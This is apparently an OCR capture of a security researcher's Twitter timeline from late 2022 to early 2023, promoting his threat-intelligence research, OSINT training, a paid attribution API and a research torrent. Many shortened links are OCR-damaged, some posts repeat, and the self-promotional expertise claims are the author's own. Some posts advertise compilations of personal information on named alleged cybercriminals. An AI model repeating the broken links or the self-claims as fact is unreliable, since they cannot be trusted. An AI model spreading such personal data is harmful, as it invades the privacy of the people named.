the project framework courtesy of me - https://t.co/a5DjewVqC4 Enjoy! 
#VirtualReality 


6 - Tuesday
02:39 

https://t.co/7po8gJj94E #Threatintel #ThreatHunting #threatintelligence 
8 - Thursday 


09:05 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #threatintel https://t.co/qzPW3UEhg8 


10:36 
https://t.co/e9uqgVWmsVL #ThreatHunting #threatintel 
10 - Saturday


13:24 


Do you want access to my collaborative Maltego graph which aims to be the world’s 
most in-depth and advanced database of hackers in the world? Check out the project 
front page - https://t.co/ZSNdyA3puE including the screenshots and ping me to 
request access. https://t.co/nMyTAqh1Ax 
Do you want access to my collaborative Maltego graph which aims to be the world’s
most in-depth and advanced database of hackers in the world? Check out the project 
front page - https://t.co/ZSNdyA3puE including the screenshots and ping me to 
request access. https://t.co/Ohu2XU6QL6 
Do you want access to my collaborative Maltego graph which aims to be the world’s
most in-depth and advanced database of hackers in the world? Check out the project 
front page - https://t.co/ZSNdyA3puE including the screenshots and ping me to 
request access. https://t.co/9wCNEDqbfh 
11 - Sunday


05:44 


https://t.co/K9UCG1BQjT #security #cybercrime #malware #Threatintel 
#ThreatHunting 
07:59


https://t.co/A75WA4Obf9 #Threatintel https://t.co/1SoeBJOwod 
https://t.co/A75WA4Obf9 #ThreatIntel https://t.co/19JfRU7CE4
https://t.co/A75WA4Obf9 #Threatintel https://t.co/lyzjyOClfu
https://t.co/I7DhqZHIZi #security #cybercrime #malware #Threatintel
#ThreatHunting 


11:53 


Hello. If you read my blog - https://t.co/JTcqOaYOur and you like it, you can
download my Android application to your phone and receive
notifications about new articles or read it directly - https://t.co/uvAt5gKHrs
Thanks. Regards. Dancho. https://t.co/YYzW8ipfLh
12 - Monday


04:02 
https://t.co/nNsXMPrGi0 https://t.co/XsLJ|QHZwK6 
04:02


04:02 


https://t.co/nNsXMPrGi0 https://t.co/Vm16WzmjuZ 
04:03
https://t.co/nNsXMPrGi0 https://t.co/JoVYCWT)jfd


04:03
https://t.co/nNsXMPrGi0 https://t.co/KOHNkIX5kF
09:10


https://t.co/r7H58PsDbt #security #cybercrime #malware #ThreatHunting 
#Threatintel 


15 - Thursday 


03:14 


Who’s using Maltego and wants access to my collaborative hacker database Graph? 
Ping me here or drop me a line at dancho.danchev@hush.com and I'll shortly send 
you the necessary accounting data for the session. Regards. Dancho 
https://t.co/WvdyDzAOYP 
Who’s using Maltego and wants access to my collaborative hacker database Graph?
Ping me here or drop me a line at dancho.danchev@hush.com and I'll shortly send 
you the necessary accounting data for the session. Regards. Dancho 
https://t.co/wcvciMHj2w 
03:14


Who’s using Maltego and wants access to my collaborative hacker database Graph? 
Ping me here or drop me a line at dancho.danchev@hush.com and I'll shortly send 
you the necessary accounting data for the session. Regards. Dancho 
https://t.co/JNUEZBm5Nc 
16 - Friday


02:15 
Folks. What do you think would be the best way for me to retire? #security
#cybercrime #malware #threathunting #threatintell #threatintel


21 
09:54 
Grab the Torrent! - https://t.co/WcTneCjIAV #security #cybercrime #malware 
#ThreatHunting #Threatintelligence #threatintell #threatreport 
https://t.co/ETfl26i9nj 
22 4


09:59 


@th3cOrt3x 256GB. Enjoy! 


10:03 


@th3cOrt3x I can confirm. Just make sure to grab the torrent and I did my best to
make it available online almost all the time. Regards. Dancho


10:06 


@th3cOrt3x Great news. Keep me posted if you encounter any issues and keep in 
touch here if you need me for anything else. Regards. Dancho 


17 - Saturday 


01:39 
Happy holidays! https://t.co/yjN2bzqCgV 
09:06
https://t.co/kyl5GvScSi https://t.co/ciyyrn7Egp
09:10


https://t.co/JTcqOaYOur https://t.co/GlqdxCaAqw 
09:11


https://t.co/JTcqOaYOur https://t.co/VreurHZLuC 
09:11


https://t.co/JTcqOaYgET https://t.co/aUZzGFsEsR1 
09:12


https://t.co/JTcqObfRwr https://t.co/Twyq3SKeDV 
09:13


https://t.co/JTcqObfRwr https://t.co/zAn1xR357c 
https://t.co/JTcqOaYOur https://t.co/340iN6gm3y
11:34


https://t.co/JTcqOaYOur https://t.co/Dn6RRyH5RE 
11:35
https://t.co/JTcqOaYgET https://t.co/XovJGbm1Sa 
11:35


https://t.co/JTcqOaYgET https://t.co/qlTKuSO88r 
11:35


https://t.co/JTcqObfRwr https://t.co/oi8TAP4vc3 




11:36 


https://t.co/JTcqOaYgET https://t.co/7Y86paVh7m 
11:36


https://t.co/JTcqOaYgET https://t.co/LETX64NTyS 
11:36


https://t.co/JTcqObfRwr https://t.co/cgnLMz9pab 
11:36


https://t.co/JTIcqOaYgET https://t.co/deGfPpDgu5 
11:37
https://t.co/JTcqOaYgET https://t.co/vHIAW8kKHHL 


https://t.co/JTcqOaYgET https://t.co/lI9eq4qldF) 
11:37


https://t.co/JTcqObfRwr https://t.co/aFvcXgKsnL 
11:38


https://t.co/JTcqOaYgET https://t.co/1VYdkObN8;j 
11:38


https://t.co/JTcqOaYgET https://t.co/hfaWcxXYKqC 
11:38


https://t.co/JTcqOaYgET https://t.co/2VJ6Kn4dCm 
11:38


https://t.co/JTcqObfRwr https://t.co/x6qqw8ADSs 
11:38


https://t.co/JTcqOaYOur https://t.co/ff4BjKz7Mq 
11:39


https://t.co/JTcqObfRwr https://t.co/N7nteTdhFG 
11:39


https://t.co/JTcqOaYOur https://t.co/yXm770IUbN 
11:39


https://t.co/JTcqObfRwr https://t.co/B1rVkV5dwF 
11:40


https://t.co/JTcqOaYOur https://t.co/o4HK3HWK8h 
11:40


https://t.co/JTcqOaYgET https://t.co/qdyeTaxbuP 
11:40


https://t.co/JTcqOaYOur https://t.co/CwRkYIH6X5 
11:40


https://t.co/JTcqOaYOur https://t.co/BYommOMX6b 
11:41


https://t.co/JTcqOaYOur https://t.co/PgQpePleyw 
11:41


https://t.co/JTcqOaYgET https://t.co/Cazu0OZ1P8 




11:41 


https://t.co/JTcqOaYOur https://t.co/YpvbaZatEd 




11:42 


https://t.co/JTcqObfRwr https://t.co/OVCAf1Lc6pT 
11:42


https://t.co/JTcqOaYOur https://t.co/isBikKnl1O1im 
11:42


https://t.co/JTcqOaYOur https://t.co/stoASwropE 
11:42


https://t.co/JTcqOaYOur https://t.co/FXyMAYe3Nc 
11:42


https://t.co/JTcqOaYgET https://t.co/ilw601Il2e 




11:43 


https://t.co/JTcqOaYgET https://t.co/TOrp4fw71u 


11:43 
https://t.co/JTcqOaYgET https://t.co/xPLkIlcXu7Z 
11:43


https://t.co/JTcqOaYgET https://t.co/DnPJnhJm7B 
11:43


https://t.co/JTcqOaYgET https://t.co/ZiPxLOMig7 
11:43


https://t.co/JTcqOaYOur https://t.co/It5qrPXTQY 




11:44 


https://t.co/JTcqObfRwr https://t.co/LbBeljacvg 
11:44


https://t.co/JTcqOaYgET https://t.co/l2foen6jhx 
18:27


https://t.co/VwTtNTqJjO #security #cybercrime #malware #Threatintelligence 
#ThreatHunting #threatintell #threatintel 


18 - Sunday 


08:38 


https://t.co/VwItNTqJjO #security #cybercrime #malware #ThreatHunting 
#threatintell https://t.co/X1GJKwLjnb 
08:39


https://t.co/VwTtNTqJjO #security #cybercrime #malware #ThreatHunting 
#threatintell https://t.co/JuUEkyH7Ey6 


[Image text, translated from Bulgarian:] Dancho Danchev is 26 years old, an internationally recognized expert
in cybersecurity. He writes for the specialized blog Zero
Day, part of the news network Zdnet.com. In September
2010 Dancho Danchev disappeared and has not responded at his
contact details since. His last activity on Twitter is from October.
The Interior Ministry comments that Dancho Danchev
has so far not been reported missing by his relatives.


08:39 


https://t.co/VwTtNTqJjO #security #cybercrime #malware #ThreatHunting
#threatintell https://t.co/ouWYl1mpNR


Hi Dancho. 


Are you alive? :) 
I just got this email. 


Best regards, 

Dmitry Bestuzhev 

Senior Regional Researcher, Latin America 
Global Research and Analysis Team 
Kaspersky Lab 

Key ID: 4096/0xE4D1B9CE 


http://www.kaspersky.com 
http://www.securelist.com


08:40 


https://t.co/VwTtNTqJjO #security #cybercrime #malware #ThreatHunting 
#threatintell https://t.co/QNXcmKyYAra 


Hi folks, 


For some unknown reason -- all the malicious links published are 
always “spaced” etc. -- my personal blog http://ddanchev.blogspot.com 
is currently blacklisted by Facebook, and readers keep emailing me 
about it. As I'm sure you've been keeping track of all my 
Facebook-friendly, anti-Koobface oriented research+things I cannot 
disclose by blogging, I think the current situation is pretty awkward. 


The profiling of the malware campaigns taking place at Facebook, does 
not emphasize on Facebook's security practices, or the lack of such. 
Instead, it's hardcore campaign dissecting focusing on the attackers. 


I'd appreciate your comments, de-blacklisting of my personal blog in 
the best case. 


Regards 

Dancho Danchev 

Cyber Threats/CyberCrime Analyst | Security Blogger, ZDNet at CBS Interactive 
Personal Blog: http://ddanchev.blogspot.com 

ZDNet Blog: http://blogs.zdnet.com/security 

Twitter: http://twitter.com/danchodanchev 


Key ID: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xD36EEF974ED6A7AD
Fingerprint: 0AF8 779A E727 4CA2 2525 7B03 D36E EF97 4ED6 A7AD


19 - Monday 


09:04 
https://t.co/3V2Fpb5HQu https://t.co/hG)jylVcn4 
09:04
https://t.co/3V2Fpb5HQu https://t.co/O9cY4CEAgT 


09:04 


https://t.co/3V2Fpb5HQu https://t.co/zHxBpUdqqV 


09:18 


https://t.co/3V2Fpb6fG2 #security #cybercrime #malware #Threatintel 
#ThreatHunting #Threatintelligence #threatintell https://t.co/poGk35kIHnB 


20 - Tuesday 
02:02 


https://t.co/JNDSZX3591 https://t.co/perySaGwoD 
02:03
https://t.co/JINDSZX3591 https://t.co/JWBiHFBhsO 


02:03 


https://t.co/JINDSZX3591 https://t.co/bRUVGI7 X6f 
03:15


Today’s modern approach of fighting #ransomware consisting of having "Dmitry is it 
you on the other side of the line?" "Confirmed. Are we gathering later today"? direct 
conversation with a cybercriminal approach should be abandoned. 


*1 
03:16 


Directly engaging with the bad guys by having what should be considered a surreal
conversation with them directly violates their OPSEC and is a good example of bad
taste.


03:19 


In terms of ransomware what do we got here? A Dark Web Onion which could be 
either shut down compromised or basically put under pressure from legitimate traffic 
trying to slow them down a free email service provider on behalf of an affiliate 
participant. 


*1 
03:20 
Figuring out surreal ways to fight ransomware should be considered a bad approach.
Instead attempt to take down the infrastructure behind the campaign including to
attempt to take offline the infrastructure of the affiliate network participant.


03:23 


Personal observations here include the massive use of Protonmail and Tutanota email 
address accounts by ransomware affiliate network participants including old 
fashioned Dark Web Onion custom or basic WordPress installations which should be 
taken offline. 




03:25 


This is a Surreal case where a central location for a revenue soliciting location is
known and what you've got there is hordes of affected victims including vendors
trying to visit it where in reality what should be done is to attempt to take it offline.


03:29 


In terms of taking the ransomware Dark Web Onions offline here’s a pretty good and 
decent three post series on some of the currently active ransomware Dark Web 
Onions - https://t.co/e9QuqVWIV6d 


23 - Friday 


09:49 


Merry Christmas to all of my friends and colleagues especially everyone who’s been
working with me as an independent contractor throughout 2022. I wanted to let
everyone know that the Second Edition of my memoir is scheduled for March, 2023.
Stay tuned! https://t.co/k4fgk3kNL4
25 - Sunday


02:47 
Happy holidays, everyone! https://t.co/opAQ7exuux 


*1 
17:55


@HeapRtl Hello. Can you send me an email at dancho.danchev@hush.com and I'll
then shortly send you the actual torrent file? Thanks a lot for the interest. Regards.
Dancho

1 

18:16 

@HeapRtl Hello. Here’s the actual download link - https://t.co/4dv6RcPYYA Regards.
Dancho

1 

26 - Monday 

08:09 


Grab a direct 256GB torrent download consisting of all of my publicly accessible 
research. Happy holidays! Direct download working link - https://t.co/a2y8HMBaq8y 
Enjoy and see you in 2023! Regards. Dancho #security #cybercrime #malware 
#Threatintelligence https://t.co/b3rmllZdJg 


21 *%2 
28 - Wednesday


17:50 
Dear @Cryptome_org I just sent you an email. I hope that we can soon feature both
publications. Regards. Dancho


31 - Saturday 


01:54 


https://t.co/gTZ1bJEDvm [PDF] #security #cybercrime #malware #Threatintelligence 
#ThreatHunting #Threatintel #threatintell #threatreport https://t.co/7WnzxfUcKM 


10:38 


Upcoming 2023 celebration! Heading to another location! Stay tuned and happy
celebration of 2023! See you in 2023. Regards. Dancho P.S I sincerely hope that my
mother won’t come across this video. Although it’s the holidays. Stay tuned and see
you in 2023! https://t.co/AYVizdzh7a


12:27 


Stay tuned! Happy New Year 2023 celebration! Regards. Dancho #security 
#cybercrime #malware #ThreatHunting #Threatintelligence https://t.co/YXnLZeDCX| 


*1 
[Image text:]
The Definite OSINT and Actionable Threat Intelligence
Compilation Guide to Assist Law Enforcement and the U.S
Intelligence Community Internationally
Dancho Danchev
https://ddanchev.blogspot.com Email: dancho.danchev@hush.com


12:31 
2022 in recap. Outstanding! https://t.co/JTcqOaYgET https://t.co/ZOgqBloxQw 


[Image text: Table 9: Quality of selected intelligence sources (10 out of 45). Rows: Dancho Danchev, Naked Security, THN, Webroot, Threat Post, TaoSecurity, Sucuri, PaloAlto, Malwarebytes, Hexacorn. Column headings (covered, timely, robust) and the percentage values are only partially legible.]
2023


January 


2 - Monday 


02:41 


https://t.co/JIcqOaYgET #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #Threatintel #threatintell https://t.co/LneyFVJM3Z 
[Image text:]
Background

I was born in Sofia, Bulgaria. My primary area of
occupation since the early 90's is computers. My
primary work is Disruptive individual's Chief
Executive Officer (CEO)

Cybercrime Researcher

Dancho Danchev Executive BIO

Warindustries - Member
BlackCode Ravers - Member
Black Sun Research Facility - Contributor
DiamondCs - List Moderator/Software Contributor
LockDownCorp - Help Trojan Database Contributor
Forbidden HelpNetSecurity - Contributor
Astalavista Security Group - Managing Director
Frame4 Security Systems - Contributor
TechGenix - WindowSecurity - Contributor
ZDNet Zero Day - Security Blogger
Webroot Threat Blog - Security Blogger

Conference and Events - Media and Press Coverage

Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat intelligence gathering
having actively pioneered his own methodology for processing threat intelligence leading to a successful set of
hundreds of high-quality analysis and research articles published at the industry's leading threat intelligence blog
ZDNet's Zero Day, Dancho Danchev's Mind Streams of Information Security Knowledge and Webroot's Threat
Blog with his research featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister, NYTimes, CNET,
ComputerWorld, H*Magazine currently producing threat intelligence at the industry's leading threat intelligence
blog - Dancho Danchev's - Mind Streams of Information Security Knowledge

With his research featured at RSA Europe, CyberCamp, InfoSec, GCHQ and Interpol the researcher continues to
actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's -
Mind Streams of Information Security Knowledge publishing a diverse set of hundreds of high-quality research
analysis detailing the malicious and fraudulent activities at nation-state and malicious actors across the globe


02:42 
Working on this. Stay tuned! https://t.co/fnswrm8KWP https://t.co/Z5jEi2XdFa 
02:46
Upcoming release. Stay tuned! https://t.co/JTcqOaYgET https://t.co/IqraOQKHob 
[Image text, partially recoverable:]
Muftabe Raza is sought after by the FBI and is on the FBI's Most Wanted Cybercriminals list for his involvement in the Forwarderz
based selling franchise where the best we could do is to offer practical and relevant analysis on his online whereabouts including ...
The first thing we wo... URL address for his rogue enterprise ... online whereabouts and actual internet-connected infrastructure
Attachment(s): Download Raza Indictment pdf
Component(s): USAO - New Jersey
Topic(s): Cyber Crime
Press Release Number: [illegible]
Among the first things you would have to do when doing OSINT in terms of finding out more about a FBI Most Wanted Cybercriminal individual would be to look inside the legal
documents behind the case which on the majority of occasions are often publicly accessible and look for the following

02:49 


*1 


Who wants or needs access to this? https://t.co/Tj9ouFrEaP 


[Image text, partially recoverable:]
... SecondEye Solutions rogue and fake ID ... the actual network infrastructure behind his ...
... on his company by actually using Google for the purpose of searching for its name and actually attempting to find the exact Web site ...
we would then use the Internet Archive including several real-time and historical WHOIS services to attempt to find out more about his ...
11Wang DarkWeb LinkFeed SkyFraud
365Exe DomenForum Linuxac.org Spyhackerz
419eater Eviloctal Master-X Svuit.vn
aHack Forum-UINSell MaulTalk Szuwi
ArmadaBoard ForumSEO Nullnoss.org Toolbabase se
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam
BPCForum Gla.vn Piratebuhta pw Vsehobby
Cardvilla GoFuckBiz ProCrd Webmasters.ru
Chf gofuckbiz.com ProLogic Whitehat.vn
CNHonker H4kurd.com Promarket WWH-Club
CNSec Hack-Port ProxyBase www.opensc.ws
Crack-Forum Hackersoft scamwarners Xakep.bg
Cracked to Hackingboard SEOCafe Xakepok
Cyberizm Hackings SEOForum Zismo
Darkmarket.la iFud
Who wants me to train him including their team or organisation on advanced #OSINT
and #Threatintelligence techniques and methodologies? I have two modules
currently available for #OSINT and #ThreatIntelligence with a lot of case studies.
https://t.co/Hn|IxkVjFco
I can teach you hardcore #OSINT and #Threatintelligence in respect to cyber threat
actor attribution and help you learn how to "connect the dots" on important cases
and basically any cyber threat actor. Are you interested? https://t.co/9G1LJUWWN8




[Image text:]
ABOUT US
Dancho Danchev Presents

Dancho Danchev is an internationally recognized
cybercrime researcher security blogger OSINT analyst and
threat intelligence analyst that's currently running one of
the security industry's most popular security publications
his personal blog - https://ddanchev.blogspot.com since
December, 2005 which has received approximately 5.6M
page views since its original start

BASIC AND ADVANCED OSINT AND THREAT INTELLIGENCE
PROGRAM BUILDING AND TRAINING

REACH US
+359876893890
Email: dancho.danchev@hush.com
https://ddanchev.blogspot.com


03:14 


I have a single requirement before we begin which is that you must either know me
personally or at least know me and my research and can describe it in a single
sentence in terms of how it helped you do your work. Drop me a line at
dancho.danchev@hush.com https://t.co/nfWrPOjdzf
https://t.co/gTZ1bJFokU [PDF] #security #cybercrime #malware #ThreatHunting
#threatintell #threatintel https://t.co/B359ZUMEFS
https://t.co/JTcqOaYgET https://t.co/LbH1U4mYO9
4 - Wednesday
Who wants access to my OpenCTI instance? No audio. #Threatintel #threatintell
#threatintelligence https://t.co/W4AAQsIxsu
Happy Aliens Day! https://t.co/ISF4wMqH1B
First client from Bulgaria, and I hope it turns out to be a super project for
training personnel in the field of #OSINT #Threatintelligence Email:
dancho.danchev@hush.com https://t.co/RLPwSwevgy
Folks. Beginning to record this. Subscribe at my YouTube Channel here -
https://t.co/hc1jf6p4TX and here - https://t.co/Cjdnb1lyQlq this is going to be a long 
massive video introduction into my experience in the field circa the 90’s up to 
present day. https://t.co/MLVGhf2miQ 


*%2 


Dancho Danchev 

https://ddanchev.blogspot.com
Email: dancho.danchev@hush.com 
+359876893890 


26 - Thursday 


08:35 


https://t.co/R4uG2zZB2tM #Threatintelligence #threatintell #threatintel 
https://t.co/9NGLMW5uh0 
13:22


https://t.co/xeyEHllajn #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #threatintell #threatintel 


13:22


https://t.co/TEtRnFxby] #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #threatintell #threatintel 
1 - Wednesday


01:53 


Who needs or wants cyber threat actor OSINT training for their team both novice and 
experienced? Drop me a line at dancho.danchev@hush.com https://t.co/xd 1NiMyReN 
Who needs or wants cyber threat actor OSINT training for their team both novice and
experienced? Drop me a line at dancho.danchev@hush.com https://t.co/DBR7kYHe7|
Folks. It’s official. I now have my own Cyber Threat Intelligence platform including a
SIEM and user-friendly API where we also accept public cyber campaign attribution
"inquiries" including "incidents" IoCs where we'll do our best to attribute the
campaign.


<1 *l 
07:31 


Anyone using EventLog Analyzer, ThreatConnect, Azure Sentinel, Splunk, Cisco, 
Elemendar, Cortex XSOAR, TrendMicro, ArcSight, Microsoft Sentinel, EventTracker, 
Plixer Scrutinizer, and needs "pull" or "push" API access? Drop me a line at 
dancho.danchev@hush.com 
Also Sumo Logic, Kaspersky CyberTrace, ServiceNow, CheckPoint ThreatCloud,
Carbon Black EDR, Cisco Email Gateway, ThreatConnect, LogPoint, Tanium,
Symantec, LogRhythm, and still wants "pull" or "push" API access? Drop me a line at
dancho.danchev@hush.com
What can you do with our threat intelligence platform? Basically you can "pull" our
daily and hourly updated threat actor specific threat intelligence including all the
associated IoCs (Indicators of Compromise). Drop me a line at
dancho.danchev@hush.com
07:32

You can also "push" your incidents including all the associated IoCs and threat actor
specific inquiries using our user-friendly API and we would pick your cyber threat actor
attribution game analysis from there. Drop me a line at dancho.danchev@hush.com
We use a dedicated in-house developed OSINT methodology which we apply to every
inquiry and incident including all the associated IoCs that you send us and will assist
you in finding out who’s behind your cyber attack campaign and will assist from there.
The best moment? We offer a fixed pricing model on a monthly basis for unlimited
"pull" requests of our threat actor specific research which we publish on a daily basis
and unlimited "push" incidents and threat actor specific inquiries on a monthly basis.


*1 
07:33 


If it’s cyber threat actor and IoCs attribution in the context of using OSINT and our
in-house threat intelligence and cross-domain reference based methodology we're
always there to assist and take your cyber threat actor attribution game to a new
level.


07:33 


Drop me a line at dancho.danchev@hush.com in order to inquire about the pricing 
and how to obtain access including your API key for the platform and let’s have a 
conversation and make it happen. 


07:34 


Check out our brochure here - https://t.co/9yEMZzlaFt and don’t forget that the best 
is yet to come and that we’re always there to take care of your cyber threat actor 
attribution inquiries and IoCs. #OSINT #ThreatIntelligence #Threatintel 
#ThreatHunting https://t.co/zeGriYNt2O 


07:48 


RT @brightorigin: @dancho_danchev is the best threat intelligence researcher I know 
for years! Consistently delivering in-depth/insightful... 


07:54 


Wow. Thanks for the comment @brightorigin the pleasure is all mine and I promise to 
continue delivering high quality research and analysis. Always feel free to catch up 
with my research here - https://t.co/JTcqOaYOur including here - 
https://t.co/UZ6qVAI5Ld https://t.co/BuemDx9enQ 

https://t.co/gr3X4ZoKOs #security #cybercrime #malware #Threatintel #threatintell 

19:24 


"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
Cybercriminals Cybercrime Gangs and Various Internationally Recognized Cyber 
Threat Actors - A 2021 Compilation" - https://t.co/zBsXh1TFH6 [PDF] 
https://t.co/UNWQQb8F63 

Who framed Dancho Danchev? 


Dancho Danchev, a Russian researcher known for his work against malware, has been missing since 
October and has never been heard of again. 


Giacomo Dotta , 

"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
Cybercriminals Cybercrime Gangs and Various Internationally Recognized Cyber 
Threat Actors - A 2021 Compilation" - https://t.co/zBSXh1TFH6 [PDF] 
https://t.co/Vnfxixaqfe] 

"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
Cybercriminals Cybercrime Gangs and Various Internationally Recognized Cyber 
Threat Actors - A 2021 Compilation" - https://t.co/zBSXh1TFH6 [PDF] 
https://t.co/2YDjfVOT29 


19:24 


Identified Competitors 

Cyber Defense Agency (CDA) (US) 
Cyber Security Research and Development Center (US) 
Cyveillance (US) 
Dancho Danchev (EU) 
Department of Homeland Security US-CERT (US) 
Ernst & Young (EU) 
EWA Information and Infrastructure Technologies, Inc. (US) 
Fortify (US) 
Global Security Mag (EU) 
iDefense Labs (US) 
JET Intelligent Risk Systems (US) 
Informatica (US) 
IT - Information Sharing and Analysis Center (US) 
iSIGHT Partners (US) 
Lookingglass (US) 
Multi-State Information Sharing Analysis Center (US) 
nCircle (US) 
SecureWorks (US) 
Trend Micro (US) 
United States Cyber Consequence Unit (US) 


"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
Cybercriminals Cybercrime Gangs and Various Internationally Recognized Cyber 
Threat Actors - A 2021 Compilation" - https://t.co/zBsXh1TFH6 [PDF] 
https://t.co/BPUB4YIQee 

"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
Cybercriminals Cybercrime Gangs and Various Internationally Recognized Cyber 
Threat Actors - A 2021 Compilation" - https://t.co/zBSKh1TFH6 [PDF] 
https://t.co/Bq6rENcx2T 

https://t.co/UZ6qVAhxVF https://t.co/cM5U3YUItp 

https://t.co/FG3ahO7dk7 #ThreatHunting #Threatintelligence #threatintell 
#threatintel 


14:11 
https://t.co/wbb5Hq8Oud #ThreatHunting #Threatintelligence #threatintell 
#threatintel 
14:12 
https://t.co/sFlv3g9Jd) #ThreatHunting #Threatintelligence #threatintell #threatintel 

https://t.co/iD8itOjjyo #ThreatHunting #Threatintelligence #threatintell #threatintel 

https://t.co/4BcQ9Tx753 #ThreatHunting #Threatintelligence #threatintell 
#threatintel 

https://t.co/CSQd9Jy2MU #ThreatHunting #Threatintelligence #threatintell 
#threatintel 

https://t.co/BbYyMw4kuA #ThreatHunting #Threatintelligence #threatintell 
#threatintel 

https://t.co/ZuwQJYxJjU #ThreatHunting #Threatintelligence #threatintell 
#threatintel 

https://t.co/an36ff6Lag #ThreatHunting #Threatintelligence #threatintell 
#threatintel 


9 - Thursday 

https://t.co/n6LihftIm3 #Threatintelligence #ThreatHunting #threatintell #threatintel 
https://t.co/TcUn9vOjVa 

Apply for Access to the Law Enforcement Nautilus Feed 

The Law Enforcement Nautilus Feed is a private subscription and collaborative service 
that offers in-depth technical analysis and attribution of curated lists of Indicators of 
Compromise (IOCs) and Articles of Interest (AOIs) linked to major malicious 
campaigns and APT groups. 

The service is available exclusively to law enforcement, government agencies, 
licensed private investigators, and security organizations. Please start the enrollment 
process by applying for access. 

"Exposing TrickBot’s Bitzlato Cryptocurrency Exchange - An OSINT Analysis" - 
https://t.co/MP9m6JRHMt #security #cybercrime #malware #threatintell #threatintel 
https://t.co/LCVgfvgNGP 

@NCSCgov Here’s my OSINT analysis - https://t.co/oF82LfFNqE here’s the actual 
document - https://t.co/Eyut9Twnoy 

https://t.co/MP9mb6JRHMt #security #cybercrime #malware #Threatintelligence 
#threathunting #threatintell #threatintel https://t.co/lYa8luUWPz 


12 - Sunday 


07:45 


O.K check this out inspired by a recent @SOSIntel tweet. Takes you back to an old 
era of hardcore research and a lot of achievements and a lot of folks that I worked 
with. Got time? Grab my memoir from here - https://t.co/6V8O0FTdlSv [PDF] 
https://t.co/C6QLyC2IH9 


10:00 
I’m back! https://t.co/JTcqOaYgET https://t.co/qoFl3P9xwz 


13 - Monday 


03:14 


"Setting them straight. Since the early days of humankind" - here’s the URL for my 

new and permanent Dark Web Onion - https://t.co/tuxftqFJxO Bookmark this today 
and stay tuned for the actual daily issued updates. Thank you everyone and stay 
tuned. https://t.co/bu8hqNpZWO 

Welcome to Dancho Danchev's Dark Web Onion - "The Future of U.S Intelligence Community and Intelligence Gathering 2.0" - Proprietary and 
Community-Driven Single-Page Summary Proactively Offering General Security and Tailored Access Operations Recommendation Advice Including 
Proprietary access to OSINT Data on Key Individuals and Communities-Of-Notice Within the Security Industry Including Various Key Members of the Russian 
and Eastern European Cybercrime Underground Obtained Using OSINT (Open Source Intelligence) Techniques and Methodologies Including Technical 
Collection Using Public Sources Courtesy of the Project Operator 

My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known 419 Scammers and International Fraudsters - An OSINT Analysis - 
https://t.co/S7ZCx3XBBI [PDF] https://t.co/6A7HnIIqEH 

My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known 419 Scammers and International Fraudsters - An OSINT Analysis - 
Part Two - https://t.co/KPHPSwIPGN [PDF] https://t.co/t2dbjgmfkKD 

My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known 419 Scammers and International Fraudsters - An OSINT Analysis - 
Part Three - https://t.co/yFL8707eK7 [PDF] https://t.co/eMGlvdw4MO 

My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known to Have Been Used by Cyber Jihadists Internationally - An OSINT 
Analysis - https://t.co/lotz4hRRO} [PDF] https://t.co/O6nfeBSDp3 

My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known Cybercrime Gangs and Cybercriminals Internationally - An OSINT 
Analysis - https://t.co/vRF3GpAHRa [PDF] https://t.co/qgR3pUNw69z 

My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Cybercrime-Friendly Forum Communities and Associated E-Shops for 
Stolen and Compromised Credit Card Details - An OSINT Analysis - 
https://t.co/etrerdRs]X [PDF] https://t.co/DkKDHcz7POx 

My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known to Have Been Used by Ransomware Network Affiliate Based 
Participants Including Ransomware Gang Affiliates - An OSINT Analysis - 
https://t.co/t2J3dZYUGM [PDF] https://t.co/BVhTjrRUWE 

My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known to Have Been Used by Ransomware Network Affiliate Based 
Participants Including Ransomware Gang Affiliates - An OSINT Analysis - Part Two - 
https://t.co/VRpVyvFco6 https://t.co/EmiFrxBfM1 

New white paper for @whoisxmlapi - Exposing a Currently Active Domains Portfolio of 
Known to Have Been Used by Ransomware Network Affiliate Based Participants 
Including Ransomware Gang Affiliates - An OSINT Analysis - Part Three - 
https://t.co/nSVINMK8Ux https://t.co/sBTrmCoDrA 

https://t.co/OmME2p6LJ8C #security #cybercrime #malware #threatintell #threatintel 
#threatintelligence 

11:29 


Who is Dancho Danchev? - Part Two - https://t.co/8fZCXOM9R5 #security 
#cybercrime #malware #ThreatHunting #threatintell #threatintel 
https://t.co/3eAWrj9juf 

https://t.co/nPxuz7Aunn https://t.co/MAYkIUNhUO 

Welcome to Dancho Danchev's Dark Web Onion - "The Future of U.S Intelligence Community and Intelligence Gathering 2.0" - Proprietary and 
Community-Driven Single-Page Summary Proactively Offering General Security and Tailored Access Operations Recommendation Advice Including 
Proprietary access to OSINT Data on Key Individuals and Communities-Of-Notice Within the Security Industry Including Various Key Members of the Russian 
and Eastern European Cybercrime Underground Obtained Using OSINT (Open Source Intelligence) Techniques and Methodologies Including Technical 
Collection Using Public Sources Courtesy of the Project Operator 

Project Operator: Dancho Danchev | Email: dancho.danchev@hush.com | Donate BitCoin: 1H74hr6hAkGv596DObhsueQgxqseVgNgzv5 

DANCHO DANCHEV'S 
SECURITY RESEARCH 
FOR WEBROOT INC 


21 - Tuesday 


07:10 


Who wants or needs full offline copy of all of my publicly accessible research since 
December, 2005 which is approximately a 253GB torrent? Grab it from here - 
https://t.co/5cbzqOK3wb and check out my Dark Web Onion here - 
